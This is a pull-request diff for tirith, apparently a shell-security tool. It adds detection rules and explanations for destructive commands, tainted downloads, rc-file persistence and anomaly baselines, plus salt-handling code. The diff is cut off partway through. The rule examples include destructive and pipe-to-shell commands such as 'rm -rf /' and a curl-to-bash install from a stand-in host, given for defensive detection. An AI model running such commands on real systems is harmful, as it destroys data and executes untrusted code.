### PR TITLE
M10 wave / Blast Radius & Diff (stacks on #128)

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -2961,6 +2961,7 @@ dependencies = [
  "ed25519-dalek",
  "etcetera",
  "fs2",
+ "getrandom 0.3.4",
  "home",
  "is-terminal",
  "libc",

--- a/crates/tirith-core/Cargo.toml
+++ b/crates/tirith-core/Cargo.toml
@@ -39,6 +39,9 @@ csv = { workspace = true }
 owo-colors = { workspace = true }
 zip = { version = "2", default-features = false, features = ["deflate"] }
 arboard = { workspace = true }
+# OS RNG for the per-install anomaly-baseline salt (M10 ch5). Tiny, OS-only
+# entropy source; already present transitively. Used by `baseline::load_or_create_salt`.
+getrandom = "0.3"
 
 [target.'cfg(unix)'.dependencies]
 libc = { workspace = true }

--- a/crates/tirith-core/assets/data/rule_explanations.toml
+++ b/crates/tirith-core/assets/data/rule_explanations.toml
@@ -2462,3 +2462,27 @@ examples_good = ["`tirith watch -- rustup-init` legitimately appending a `. \"$H
 false_positive_guidance = "Many legitimate installers edit a shell rc file to add their bin directory to PATH (rustup, nvm, conda, pyenv). This rule reports the CHANGE, not maliciousness — open the rc file, review the added lines, and accept them if you recognize the tool. It fires per watched run; it is not a persistent baseline."
 remediation = "Open the modified rc file and review what the command added. If it is an expected PATH/env line from a tool you just installed, keep it. If you do not recognize it, remove the line and investigate the command's provenance before running it again."
 mitre_id = "T1546.004"
+
+[[rule]]
+id = "exec_of_tainted_file"
+title = "Executing a file downloaded from a risky source"
+category = "taint"
+severity_rationale = "High — the command leader is a path tirith recorded as tainted: a file written to disk from an untrusted source (a `tirith fetch --save <path> <url>` download). Running a freshly-downloaded installer/script before reading it is the exact supply-chain flow this tracking exists to catch. The taint persists until you explicitly clear it, so this fires every time you run the file."
+description = "Fired by the exec hot path when the parsed command leader resolves to a path present in the taint store (`state-dir/taint.jsonl`). A path becomes tainted when `tirith fetch --save ./install.sh https://untrusted.example/install.sh` keeps a downloaded file at a known path. A later `bash ./install.sh` (or `./install.sh`) against that same path then fires this rule. The store is path-keyed: moving the file with `mv` loses the mark (documented limitation). The mark is NEVER auto-cleared by `chmod +x` or a `bash -n` parse check — only `tirith taint clear <file>` removes it."
+examples_bad = ["`bash ./install.sh` right after `tirith fetch --save ./install.sh https://untrusted.example/install.sh`", "`./setup.sh` where setup.sh was saved from an untrusted URL and never reviewed"]
+examples_good = ["reviewing the saved file, confirming it is benign, then `tirith taint clear ./install.sh` before running it", "running a script you wrote yourself or installed via a signed package (never marked tainted)"]
+false_positive_guidance = "This rule reports PROVENANCE, not malice — a file you downloaded and reviewed is still tainted until you clear the mark. After you have read the file and decided to trust it, run `tirith taint clear <file>` to remove the mark; subsequent runs will not fire. Use `tirith taint explain <file>` to see where the mark came from."
+remediation = "Open the file and read it before executing — confirm the interpreter, any network calls, and any sudo/privileged operations. Once you trust it, run `tirith taint clear <file>` to clear the mark. Prefer installing software from signed packages over downloaded scripts where possible."
+mitre_id = "T1105"
+
+[[rule]]
+id = "command_sourced_from_tainted_file"
+title = "Sourcing a file downloaded from a risky source"
+category = "taint"
+severity_rationale = "Medium — a `source ./tainted.sh` / `. ./tainted.sh` sources a file tirith recorded as tainted. Sourcing runs the file's commands in your current shell (it can export variables, define functions, and alter your environment), so it is at least as powerful as executing it. Best-effort and Medium because the `source`/`.` builtin shape is only matched when it is the command leader — a lower-confidence signal than a direct exec."
+description = "Fired by the exec hot path when the command leader is the `source` builtin or `.` and its first file argument resolves to a path in the taint store (`state-dir/taint.jsonl`). A path becomes tainted via `tirith fetch --save`. Like `exec_of_tainted_file`, the store is path-keyed (a `mv` loses the mark) and the mark is never auto-cleared — only `tirith taint clear <file>` removes it."
+examples_bad = ["`source ./env.sh` where env.sh was saved from an untrusted URL", "`. ./completions.sh` for a completions file downloaded from a risky source and never reviewed"]
+examples_good = ["reviewing the file then `tirith taint clear ./env.sh` before sourcing it", "sourcing a file you wrote or that ships with a trusted package (never marked tainted)"]
+false_positive_guidance = "Reports provenance, not malice. After you have read the sourced file and decided to trust it, run `tirith taint clear <file>`; subsequent `source`/`.` of that path will not fire. Use `tirith taint explain <file>` to see the recorded origin."
+remediation = "Read the file before sourcing it — sourcing runs its contents in your live shell. Once you trust it, run `tirith taint clear <file>` to clear the mark."
+mitre_id = "T1105"

--- a/crates/tirith-core/assets/data/rule_explanations.toml
+++ b/crates/tirith-core/assets/data/rule_explanations.toml
@@ -2366,3 +2366,87 @@ examples_good = ["A hook that runs locally-installed tooling with no remote fetc
 false_positive_guidance = "Running a pinned remote tool can be legitimate. Prefer pinned versions + integrity hashes; review unfamiliar URLs / packages."
 remediation = "Review the hook (`tirith hooks explain <name>`). Pin remote packages to a version + integrity hash, or vendor them locally. Investigate URLs you do not recognize."
 mitre_id = "T1195.002"
+
+[[rule]]
+id = "blast_deletes_outside_repo"
+title = "Destructive command reaches outside the repository"
+category = "blast"
+severity_rationale = "High — `tirith preview` resolved a destructive target (rm/mv/chmod -R/find -delete/rsync --delete) to a path outside the current repository (or above the current directory). Operating destructively outside the repo boundary is how an intended `rm -rf ./build` becomes a wipe of a sibling project or a home directory."
+description = "Surfaced ONLY by `tirith preview -- \"<cmd>\"`, which walks the filesystem to resolve the command's targets. At least one target canonicalizes outside the repo root. The `tirith check` hot path never walks the filesystem and never emits this rule — it is a simulator-only signal."
+examples_bad = ["`tirith preview -- \"rm -rf ../other-project\"` from inside a repo", "`rm -rf $HOME/work` while the intended target was a repo-relative dir"]
+examples_good = ["`tirith preview -- \"rm -rf ./dist\"` showing `outside repo: no`"]
+false_positive_guidance = "Deleting outside the repo is sometimes intended (cleaning a shared cache). Confirm the resolved paths in the preview output match what you mean to remove."
+remediation = "Re-run with repo-relative paths, or double-check the absolute/`..` target in the preview output before executing. Prefer deleting from inside the directory you mean to clean."
+mitre_id = "T1485"
+
+[[rule]]
+id = "blast_writes_system_path"
+title = "Destructive command targets a system path"
+category = "blast"
+severity_rationale = "High — a destructive command (rm/mv/chmod -R/find -delete/rsync --delete) targets a broad system path (`/`, `/home`, `/usr`, `/etc`, `~`, …) by string shape alone. Even when intentional this routinely breaks the OS, removes other users' data, or strips permissions across a system tree."
+description = "Fired on the `engine::analyze` hot path by the CHEAP, filesystem-free `blast_radius::cheap_check`: the parsed target is a well-known system path. No filesystem walk is involved — this is a pure string-shape check. Run `tirith preview` for the full impact count."
+examples_bad = ["`rm -rf /`", "`rm -rf /home`", "`chmod -R 0777 /etc`", "`mv important /`"]
+examples_good = ["`rm -rf ./dist`", "`rm -rf node_modules`", "`chmod -R u+x ./scripts`"]
+false_positive_guidance = "A deliberate system-wide change (rare, usually under a package manager or with sudo) will trip this. If you truly mean a system path, you already know the risk; otherwise re-check the target."
+remediation = "Target a specific repo-relative or project path instead of a broad system directory. Run `tirith preview -- \"<cmd>\"` to see exactly what would be affected before executing."
+mitre_id = "T1485"
+
+[[rule]]
+id = "blast_symlink_traversal"
+title = "Destructive command's target tree contains symlinks"
+category = "blast"
+severity_rationale = "Medium — `tirith preview` found symbolic links inside the destructive target tree. Depending on the tool and flags, a destructive operation can traverse a link and affect files outside the visible tree. Reported at Medium because not every traversal is harmful, but it is worth reviewing."
+description = "Surfaced ONLY by `tirith preview -- \"<cmd>\"`, which walks the target tree (links are counted, never followed). The presence of symlinks is reported so you can confirm none of them point somewhere you do not intend to touch. The hot path never walks the filesystem and never emits this rule."
+examples_bad = ["A `dist/` tree containing a symlink to `/etc/hosts`, about to be `rm -rf`'d"]
+examples_good = ["A target tree with no symlinks (`symlinks: 0` in the preview output)"]
+false_positive_guidance = "Symlinks in a build tree are common and often safe to delete (the link, not its target, is removed by most tools). Review where each link points if you are unsure."
+remediation = "Inspect the symlinks listed by the preview and confirm their targets. Use tool flags that do not follow symlinks where available."
+mitre_id = "T1485"
+
+[[rule]]
+id = "blast_empty_var_glob"
+title = "Destructive command targets an empty-variable path"
+category = "blast"
+severity_rationale = "High — an argument of the shape `\"$VAR/\"` where `VAR` is unset/empty expands to `\"/\"`, so the command operates on the filesystem root. This is the classic `rm -rf \"$EMPTY/\"` footgun that wipes a machine when a build variable is never set."
+description = "Fired on the `engine::analyze` hot path by the CHEAP `blast_radius::cheap_check`: a `\"$VAR/\"`-shaped target whose variable resolves to empty in the snapshotted environment. The detector takes the environment as an injected map, so the empty-variable case is unit-tested without mutating the process environment."
+examples_bad = ["`rm -rf \"$BUILD_DIR/\"` when `BUILD_DIR` was never exported", "`rm -rf \"${PREFIX}/\"` with `PREFIX` empty"]
+examples_good = ["`rm -rf \"${BUILD_DIR:?must be set}/\"` (fails loudly if unset)", "`rm -rf \"$BUILD_DIR/\"` with `BUILD_DIR=dist` set"]
+false_positive_guidance = "If the variable is set elsewhere (a parent process, a sourced file) the static check cannot see it and may over-report. Confirm the variable is actually populated at run time."
+remediation = "Guard the variable: `\"${VAR:?VAR must be set}/\"` aborts when it is empty. Set and export the variable before the destructive command, and quote it."
+mitre_id = "T1485"
+
+[[rule]]
+id = "blast_find_delete"
+title = "find with -delete recursively removes files"
+category = "blast"
+severity_rationale = "Medium — `find … -delete` traverses the directory tree and unlinks every matching entry. A broad or mistaken predicate can remove far more than intended. Reported at Medium so it warns without blocking everyday cleanups."
+description = "Fired on the `engine::analyze` hot path by the CHEAP `blast_radius::cheap_check` when a `find` invocation carries a `-delete` action. Run `tirith preview` to see how many files the predicate would actually remove before executing."
+examples_bad = ["`find . -type f -delete`", "`find / -name '*.tmp' -delete`"]
+examples_good = ["`find . -type f -name '*.rs'` (no `-delete` — just lists)", "`find ./cache -mtime +30 -delete` after previewing the count"]
+false_positive_guidance = "Periodic cache/temp cleanups legitimately use `find -delete`. Preview the match set to confirm the predicate is scoped the way you expect."
+remediation = "Run the `find` without `-delete` first (or `tirith preview -- \"<cmd>\"`) to see what matches, then add `-delete` once the match set is confirmed."
+mitre_id = "T1485"
+
+[[rule]]
+id = "blast_rsync_delete"
+title = "rsync --delete prunes the destination"
+category = "blast"
+severity_rationale = "Medium — `rsync --delete` removes anything in the destination that is not present in the source. A swapped source/destination, a trailing-slash mistake, or an empty source can wipe the destination tree. Reported at Medium so it warns without blocking routine mirrors."
+description = "Fired on the `engine::analyze` hot path by the CHEAP `blast_radius::cheap_check` when an `rsync` invocation carries `--delete` / `--delete-*` / `--del`. The destination operand is the side that loses files. Run `tirith preview` to understand the impact."
+examples_bad = ["`rsync -a --delete /empty/ /important/` (empties the destination)", "`rsync -a --delete` with source and destination swapped"]
+examples_good = ["`rsync -a src/ dst/` (no `--delete`)", "`rsync -a --delete ./build/ ./public/` after confirming the source is correct"]
+false_positive_guidance = "Mirroring with `--delete` is a normal deploy/backup pattern. Double-check the source/destination order and trailing slashes before running."
+remediation = "Run with `--dry-run` (or `tirith preview -- \"<cmd>\"`) first to see what would be deleted on the destination, then drop `--dry-run` once confirmed."
+mitre_id = "T1485"
+
+[[rule]]
+id = "blast_large_file_count"
+title = "Destructive command affects a large number of files"
+category = "blast"
+severity_rationale = "Info — a `tirith preview` simulation counted more than 1000 files in the destructive target tree. This is not necessarily wrong, but a four-figure file count is large enough to be worth a second look before executing. Info severity never blocks."
+description = "Surfaced ONLY by `tirith preview -- \"<cmd>\"`, which walks the target tree (depth ≤ 5, capped at 100k files) and counts files. The hot path never walks the filesystem and never emits this rule — it is a simulator-only signal."
+examples_bad = ["`tirith preview -- \"rm -rf ./node_modules\"` reporting tens of thousands of files"]
+examples_good = ["`tirith preview -- \"rm -rf ./dist\"` reporting a handful of files"]
+false_positive_guidance = "Deleting a large generated tree (node_modules, target/, a cache) legitimately touches many files. The count is informational — confirm it matches the directory you mean to remove."
+remediation = "Confirm the large count corresponds to the directory you intend to delete (a generated/cache tree is expected). If the count is surprising, re-check the target path."
+mitre_id = "T1485"

--- a/crates/tirith-core/assets/data/rule_explanations.toml
+++ b/crates/tirith-core/assets/data/rule_explanations.toml
@@ -2450,3 +2450,15 @@ examples_good = ["`tirith preview -- \"rm -rf ./dist\"` reporting a handful of f
 false_positive_guidance = "Deleting a large generated tree (node_modules, target/, a cache) legitimately touches many files. The count is informational — confirm it matches the directory you mean to remove."
 remediation = "Confirm the large count corresponds to the directory you intend to delete (a generated/cache tree is expected). If the count is surprising, re-check the target path."
 mitre_id = "T1485"
+
+[[rule]]
+id = "post_run_shell_rc_modified"
+title = "Watched command modified a shell rc / profile file"
+category = "persistence"
+severity_rationale = "High — `tirith watch` snapshots your shell rc/profile files before and after the watched command and found one changed. A command you ran for some unrelated purpose (an installer, a package add) quietly rewriting `~/.bashrc` / `~/.zshrc` / `~/.profile` / a fish or PowerShell profile is a classic persistence foothold: the injected line runs on every new login shell and survives reboots."
+description = "Fired by `tirith watch -- \"<cmd>\"`, which records the sha256 of each shell rc/profile file, runs the command, then re-hashes. A changed hash means the command modified that file during the run. The finding reports WHICH file changed; it does not echo the file contents."
+examples_bad = ["`tirith watch -- npm install some-pkg` where the package's postinstall appends `source ~/.cache/x.sh` to ~/.zshrc", "an installer that adds a PATH shim to ~/.bashrc without asking"]
+examples_good = ["`tirith watch -- rustup-init` legitimately appending a `. \"$HOME/.cargo/env\"` line you expected — review the change and accept it", "a command that touches no rc file at all (no finding)"]
+false_positive_guidance = "Many legitimate installers edit a shell rc file to add their bin directory to PATH (rustup, nvm, conda, pyenv). This rule reports the CHANGE, not maliciousness — open the rc file, review the added lines, and accept them if you recognize the tool. It fires per watched run; it is not a persistent baseline."
+remediation = "Open the modified rc file and review what the command added. If it is an expected PATH/env line from a tool you just installed, keep it. If you do not recognize it, remove the line and investigate the command's provenance before running it again."
+mitre_id = "T1546.004"

--- a/crates/tirith-core/assets/data/rule_explanations.toml
+++ b/crates/tirith-core/assets/data/rule_explanations.toml
@@ -2486,3 +2486,27 @@ examples_good = ["reviewing the file then `tirith taint clear ./env.sh` before s
 false_positive_guidance = "Reports provenance, not malice. After you have read the sourced file and decided to trust it, run `tirith taint clear <file>`; subsequent `source`/`.` of that path will not fire. Use `tirith taint explain <file>` to see the recorded origin."
 remediation = "Read the file before sourcing it — sourcing runs its contents in your live shell. Once you trust it, run `tirith taint clear <file>` to clear the mark."
 mitre_id = "T1105"
+
+[[rule]]
+id = "anomaly_first_time_in_this_repo"
+title = "First time tirith has seen this pattern for you"
+category = "anomaly"
+severity_rationale = "Info — this is an OPT-IN baseline signal (off by default; enable with `tirith baseline learn`). When on, tirith records a privacy-hashed tuple for every detection-rule firing and notes when a firing finding's pattern has never been seen in your 90-day window. It is purely informational: it annotates 'this is new for you' and NEVER changes the verdict's action. The underlying finding's own severity is what gates the command."
+description = "Fired by the engine ONLY when `policy.baseline_enabled` is set AND another rule already fired. The engine looks up the firing finding's tuple `(rule_id, salted-host-hash, ecosystem, sudo-flag, salted-cwd/repo-hash)` in the sliding window at `state-dir/baseline.jsonl`; a zero count means first-time. The observation is recorded regardless, so the next identical pattern is no longer first-time. PRIVACY: the store records salted-sha256 hashes of hostnames and the repo root — never raw hostnames or paths — with a per-install salt at `state-dir/baseline.salt`."
+examples_bad = ["the first `curl https://new-host/install.sh | bash` you have ever run against a given host (the pipe-to-shell finding fires; this annotates that the host is new for you)"]
+examples_good = ["a pattern you run routinely (already seen 3 or more times in the window — no anomaly annotation)"]
+false_positive_guidance = "Early on, EVERYTHING is first-time because the window is empty — `tirith doctor` reports 'early-baseline mode' until you have about 30 observations. This is expected. The signal becomes meaningful only after the baseline has filled in. It is Info and never blocks; treat it as a 'have I done this before?' hint, not a verdict."
+remediation = "This is informational. If the pattern is one you intend to run, no action is needed — it will not be flagged as first-time again. If it is unexpected, review the underlying finding (the rule that actually fired) before proceeding. To stop these annotations, turn the baseline off (set `baseline_enabled: false` in policy) or ignore the Info line."
+mitre_id = "T1078"
+
+[[rule]]
+id = "anomaly_rare_in_baseline"
+title = "This pattern is rare in your baseline"
+category = "anomaly"
+severity_rationale = "Info — like `anomaly_first_time_in_this_repo`, this is an OPT-IN baseline signal (off by default). It fires when a firing finding's privacy-hashed tuple HAS been seen before but only rarely (fewer than three times) in the 90-day window. Informational only; never changes the action."
+description = "Fired by the engine ONLY when `policy.baseline_enabled` is set AND another rule already fired, when the looked-up tuple's in-window count is 1 or 2. Same privacy model as `anomaly_first_time_in_this_repo`: salted-sha256 hashes, never raw values."
+examples_bad = ["the second `aws s3 rm` you have run against a given (hashed) host this quarter — seen once before, still rare"]
+examples_good = ["a pattern you run several times a week (count 3 or more — no anomaly annotation)"]
+false_positive_guidance = "A rare pattern is not a malicious pattern — it is simply uncommon for you. As with the first-time rule, the signal is only meaningful once the baseline has filled in (`tirith doctor` reports 'early-baseline mode' until about 30 observations). Info severity; never blocks."
+remediation = "Informational. Review the underlying finding if the pattern is unexpected. No action is required if it is a routine-but-infrequent command."
+mitre_id = "T1078"

--- a/crates/tirith-core/build.rs
+++ b/crates/tirith-core/build.rs
@@ -1257,6 +1257,12 @@ const EXPECTED_RULES: &[(&str, &str)] = &[
     ("blast_large_file_count", "BlastLargeFileCount"),
     // Post-run diff rule (M10 ch2).
     ("post_run_shell_rc_modified", "PostRunShellRcModified"),
+    // Tainted-content tracking rules (M10 ch3).
+    ("exec_of_tainted_file", "ExecOfTaintedFile"),
+    (
+        "command_sourced_from_tainted_file",
+        "CommandSourcedFromTaintedFile",
+    ),
 ];
 
 const VALID_CATEGORIES: &[&str] = &[
@@ -1287,6 +1293,7 @@ const VALID_CATEGORIES: &[&str] = &[
     "exec",
     "hooks",
     "blast",
+    "taint",
 ];
 
 #[derive(Deserialize)]

--- a/crates/tirith-core/build.rs
+++ b/crates/tirith-core/build.rs
@@ -738,6 +738,28 @@ const PATTERN_TABLE: &[PatternEntry] = &[
         notes: "printenv/env piped to a network sink (M9 ch4)",
     },
     PatternEntry {
+        id: "destructive_fs_op",
+        // M10 ch1 — destructive filesystem ops (`rm`, `mv`, `chmod`, `find`,
+        // `rsync`). The PATTERN_TABLE entry is a coarse tier-1 probe; the
+        // precise "target is a system path / empty-`$VAR/` glob /
+        // `find -delete` / `rsync --delete`" matching lives in the CHEAP,
+        // filesystem-free `blast_radius::cheap_check` (hot path).
+        //
+        // The full filesystem-walking simulator (`blast_radius::simulate`)
+        // runs ONLY under explicit `tirith preview` and is NEVER reached from
+        // the hot path — see the `engine::analyze` doc-comment for the split.
+        //
+        // Word boundaries (`\b`) keep `rmdir`-style longer tokens that share a
+        // prefix out where it matters; `\brm\b` matches the `rm` leader and not
+        // `charm`/`firmware`. `find`/`rsync`/`chmod`/`mv` are likewise bounded.
+        // The cheap check re-verifies the leader token anyway, so a coarse
+        // tier-1 hit on (e.g.) `mv` in prose is harmless — it just proceeds to
+        // tier-3 where `cheap_check` finds no destructive segment.
+        tier1_exec_fragments: &[r"\b(?:rm|mv|chmod|find|rsync)\b"],
+        tier1_paste_only_fragments: &[],
+        notes: "Destructive filesystem ops for blast-radius cheap check (M10 ch1)",
+    },
+    PatternEntry {
         id: "prompt_injection_seed",
         // M7 ch5 — paste-only fast gate for the prompt-injection rule.
         //
@@ -1225,6 +1247,14 @@ const EXPECTED_RULES: &[(&str, &str)] = &[
         "RepoHookSuspiciousShellPattern",
     ),
     ("repo_hook_external_fetch", "RepoHookExternalFetch"),
+    // Blast-radius rules (M10 ch1).
+    ("blast_deletes_outside_repo", "BlastDeletesOutsideRepo"),
+    ("blast_writes_system_path", "BlastWritesSystemPath"),
+    ("blast_symlink_traversal", "BlastSymlinkTraversal"),
+    ("blast_empty_var_glob", "BlastEmptyVarGlob"),
+    ("blast_find_delete", "BlastFindDelete"),
+    ("blast_rsync_delete", "BlastRsyncDelete"),
+    ("blast_large_file_count", "BlastLargeFileCount"),
 ];
 
 const VALID_CATEGORIES: &[&str] = &[
@@ -1254,6 +1284,7 @@ const VALID_CATEGORIES: &[&str] = &[
     "aliases",
     "exec",
     "hooks",
+    "blast",
 ];
 
 #[derive(Deserialize)]

--- a/crates/tirith-core/build.rs
+++ b/crates/tirith-core/build.rs
@@ -1263,6 +1263,12 @@ const EXPECTED_RULES: &[(&str, &str)] = &[
         "command_sourced_from_tainted_file",
         "CommandSourcedFromTaintedFile",
     ),
+    // Anomaly-detection rules (M10 ch5, D2).
+    (
+        "anomaly_first_time_in_this_repo",
+        "AnomalyFirstTimeInThisRepo",
+    ),
+    ("anomaly_rare_in_baseline", "AnomalyRareInBaseline"),
 ];
 
 const VALID_CATEGORIES: &[&str] = &[
@@ -1294,6 +1300,7 @@ const VALID_CATEGORIES: &[&str] = &[
     "hooks",
     "blast",
     "taint",
+    "anomaly",
 ];
 
 #[derive(Deserialize)]

--- a/crates/tirith-core/build.rs
+++ b/crates/tirith-core/build.rs
@@ -1255,6 +1255,8 @@ const EXPECTED_RULES: &[(&str, &str)] = &[
     ("blast_find_delete", "BlastFindDelete"),
     ("blast_rsync_delete", "BlastRsyncDelete"),
     ("blast_large_file_count", "BlastLargeFileCount"),
+    // Post-run diff rule (M10 ch2).
+    ("post_run_shell_rc_modified", "PostRunShellRcModified"),
 ];
 
 const VALID_CATEGORIES: &[&str] = &[

--- a/crates/tirith-core/src/baseline.rs
+++ b/crates/tirith-core/src/baseline.rs
@@ -213,24 +213,71 @@ fn salt_in(dir: &Path) -> PathBuf {
 
 // ─── salt ──────────────────────────────────────────────────────────────────--
 
-/// Load the per-install salt from `salt_path`, generating and persisting a fresh
-/// 32-byte random salt (mode `0600`) when absent. Returns the raw salt bytes.
-///
-/// On any I/O failure the call still returns a usable in-memory salt (generated
-/// fresh) so hashing never fails the hot path; a non-persisted salt only means
-/// the hashes won't be stable across processes, which is acceptable fail-open
-/// behavior (worst case: a pattern looks new once more than it should).
-fn load_or_create_salt(salt_file: &Path) -> Vec<u8> {
-    if let Ok(bytes) = std::fs::read(salt_file) {
-        if bytes.len() >= 16 {
-            return bytes;
+/// Fixed salt length. The salt file must be EXACTLY this many bytes; a
+/// shorter file (truncated, crash mid-write, or attacker-shrunk) is rejected and
+/// regenerated, so the documented 32-byte privacy guarantee can never silently
+/// degrade to a weak salt.
+const SALT_LEN: usize = 32;
+
+/// Per-process salt state. Resolved once (I1: no N+1 file reads on the hot path)
+/// and cached, keyed on the salt path so test entry points with distinct temp
+/// paths each resolve their own salt.
+enum SaltState {
+    /// A usable salt (read from disk or freshly generated AND persisted).
+    Ready(Vec<u8>),
+    /// The salt is corrupt/unreadable AND could not be persisted, so a fresh
+    /// per-run salt would churn every hash and make EVERY pattern look
+    /// "first time" forever (F4). Baseline is disabled for the session.
+    Disabled,
+}
+
+/// Cache of `(salt_path, state)`. Reloads only when the path differs (production
+/// always passes the same `state_dir()/baseline.salt`, so it loads once).
+static SALT_CACHE: std::sync::Mutex<Option<(PathBuf, std::sync::Arc<SaltState>)>> =
+    std::sync::Mutex::new(None);
+
+/// One-shot guard so the "baseline disabled" warning prints at most once per
+/// process even if many findings fire.
+static SALT_WARNED: std::sync::atomic::AtomicBool = std::sync::atomic::AtomicBool::new(false);
+
+/// Resolve the per-install salt for `salt_file`, caching the result for the
+/// process. See [`load_salt_state`] for the read/generate/persist logic.
+fn salt_state(salt_file: &Path) -> std::sync::Arc<SaltState> {
+    let mut guard = SALT_CACHE.lock().unwrap_or_else(|e| e.into_inner());
+    if let Some((path, state)) = guard.as_ref() {
+        if path == salt_file {
+            return std::sync::Arc::clone(state);
         }
     }
+    let state = std::sync::Arc::new(load_salt_state(salt_file));
+    *guard = Some((salt_file.to_path_buf(), std::sync::Arc::clone(&state)));
+    state
+}
+
+/// Read the salt from `salt_file` (must be exactly [`SALT_LEN`] bytes), or
+/// generate a fresh 32-byte salt and persist it atomically at `0600`.
+///
+/// Fail-open with a floor: if the file is absent/corrupt AND the fresh salt
+/// cannot be persisted, returns [`SaltState::Disabled`] (with a one-time stderr
+/// warning) rather than handing back an unpersisted salt that would churn every
+/// hash and fire `AnomalyFirstTimeInThisRepo` forever (F4).
+fn load_salt_state(salt_file: &Path) -> SaltState {
+    let mut existing_is_corrupt = false;
+    if let Ok(bytes) = std::fs::read(salt_file) {
+        if bytes.len() == SALT_LEN {
+            return SaltState::Ready(bytes);
+        }
+        // A short/oversized salt file is corrupt — must be OVERWRITTEN, not
+        // adopted (I2). Remember this so persist replaces it atomically rather
+        // than treating an `AlreadyExists` as "another process won the race".
+        existing_is_corrupt = true;
+    }
+
     // Generate a fresh 32-byte salt from the OS RNG. On the (extremely unlikely)
     // event that the OS entropy source fails, fall back to a time-derived salt
-    // so hashing never aborts the hot path — fail-open, since a weak salt only
-    // weakens the privacy guarantee for this one process, it never crashes.
-    let mut salt = [0u8; 32];
+    // so hashing never aborts — fail-open, since a weak salt only weakens the
+    // privacy guarantee for this one process, it never crashes.
+    let mut salt = [0u8; SALT_LEN];
     if getrandom::fill(&mut salt).is_err() {
         let nanos = std::time::SystemTime::now()
             .duration_since(std::time::UNIX_EPOCH)
@@ -240,21 +287,107 @@ fn load_or_create_salt(salt_file: &Path) -> Vec<u8> {
     }
     let salt = salt.to_vec();
 
-    // Best-effort persist at 0600. A failure here is non-fatal.
-    if let Some(parent) = salt_file.parent() {
-        let _ = std::fs::create_dir_all(parent);
+    match persist_salt(salt_file, &salt, existing_is_corrupt) {
+        Ok(persisted) => SaltState::Ready(persisted),
+        Err(_) => {
+            // Could neither read a stable salt nor write a fresh one. A per-run
+            // salt would make every pattern look new on every invocation,
+            // turning the anomaly signal into perpetual noise — so disable
+            // baseline for this session and tell the user once.
+            warn_baseline_disabled_once(salt_file);
+            SaltState::Disabled
+        }
     }
+}
+
+/// Install `salt` at `salt_file` (mode `0600`) and return the salt that is now
+/// ON DISK.
+///
+/// Two cases:
+///   * `replace_corrupt == false` (the file was ABSENT): claim it exclusively
+///     with `create_new`. If another process created it first (greptile #4
+///     concurrent-first-use race), ADOPT that process's salt by reading it back
+///     instead of clobbering it — so two processes that start together never
+///     diverge (one salt in memory, a different one on disk).
+///   * `replace_corrupt == true` (the file existed but was the wrong length):
+///     overwrite it atomically via a sibling temp file + rename (I2), so a
+///     short/truncated salt is regenerated rather than adopted.
+///
+/// In both cases a crash mid-write never leaves a half-written salt. The absent
+/// path's exclusive `create_new` followed by one `write_all` is the only writer
+/// of a fresh file, and the replace path renames a fully-written temp file into
+/// place.
+fn persist_salt(salt_file: &Path, salt: &[u8], replace_corrupt: bool) -> std::io::Result<Vec<u8>> {
+    if let Some(parent) = salt_file.parent() {
+        std::fs::create_dir_all(parent)?;
+    }
+
+    if replace_corrupt {
+        // Atomic overwrite of a corrupt (wrong-length) salt.
+        let dir = salt_file.parent().unwrap_or_else(|| Path::new("."));
+        let mut tmp = tempfile::NamedTempFile::new_in(dir)?;
+        #[cfg(unix)]
+        {
+            use std::os::unix::fs::PermissionsExt;
+            tmp.as_file()
+                .set_permissions(std::fs::Permissions::from_mode(0o600))?;
+        }
+        tmp.write_all(salt)?;
+        tmp.persist(salt_file).map_err(|e| e.error)?;
+        return Ok(salt.to_vec());
+    }
+
+    // Absent file: try to claim it exclusively so concurrent first-use does not
+    // produce two diverging salts.
     let mut opts = std::fs::OpenOptions::new();
-    opts.create(true).write(true).truncate(true);
+    opts.write(true).create_new(true);
     #[cfg(unix)]
     {
         use std::os::unix::fs::OpenOptionsExt;
         opts.mode(0o600);
     }
-    if let Ok(mut f) = opts.open(salt_file) {
-        let _ = f.write_all(&salt);
+    match opts.open(salt_file) {
+        Ok(mut f) => {
+            f.write_all(salt)?;
+            f.sync_all().ok();
+            Ok(salt.to_vec())
+        }
+        Err(e) if e.kind() == std::io::ErrorKind::AlreadyExists => {
+            // Lost the race — adopt the on-disk salt when it is the right
+            // length; otherwise propagate so the caller disables baseline.
+            match std::fs::read(salt_file) {
+                Ok(bytes) if bytes.len() == SALT_LEN => Ok(bytes),
+                Ok(_) => Err(std::io::Error::new(
+                    std::io::ErrorKind::InvalidData,
+                    "concurrent salt file is corrupt",
+                )),
+                Err(e) => Err(e),
+            }
+        }
+        Err(e) => Err(e),
     }
-    salt
+}
+
+fn warn_baseline_disabled_once(salt_file: &Path) {
+    use std::sync::atomic::Ordering;
+    if !SALT_WARNED.swap(true, Ordering::Relaxed) {
+        eprintln!(
+            "tirith: WARNING: baseline salt at {} is unreadable and could not be \
+             written; anomaly baseline is disabled for this session (run \
+             `tirith doctor` to diagnose the state directory).",
+            salt_file.display()
+        );
+    }
+}
+
+/// `true` when the baseline is disabled for this session because the salt is
+/// neither readable nor writable. The engine consults this to skip the whole
+/// baseline block rather than emit perpetual false `first-time` anomalies (F4).
+pub fn session_disabled() -> bool {
+    match salt_path() {
+        Some(sp) => matches!(*salt_state(&sp), SaltState::Disabled),
+        None => true,
+    }
 }
 
 /// Salted-sha256 of `value`, hex, truncated to `len` chars. Used for both the
@@ -269,14 +402,17 @@ fn salted_hash(salt: &[u8], value: &str, len: usize) -> String {
 
 /// Compute the host hash for a raw hostname using the salt in `salt_file`.
 /// Hostnames are lowercased first so `GitHub.com` and `github.com` collapse.
-pub fn hash_host_at(salt_file: &Path, host: &str) -> String {
-    let salt = load_or_create_salt(salt_file);
-    salted_hash(&salt, &host.trim().to_ascii_lowercase(), 16)
+/// Returns `None` when the salt is disabled for the session (F4).
+pub fn hash_host_at(salt_file: &Path, host: &str) -> Option<String> {
+    match &*salt_state(salt_file) {
+        SaltState::Ready(salt) => Some(salted_hash(salt, &host.trim().to_ascii_lowercase(), 16)),
+        SaltState::Disabled => None,
+    }
 }
 
 /// Compute the cwd/repo hash. `cwd` is resolved to its repository root (nearest
 /// `.git` ancestor) in-process; when not in a repo, the cwd path is hashed
-/// directly. Returns `None` only when no cwd is resolvable.
+/// directly. Returns `None` when no cwd is resolvable OR the salt is disabled.
 pub fn hash_cwd_at(salt_file: &Path, cwd: Option<&str>) -> Option<String> {
     let resolved = crate::policy::find_repo_root(cwd)
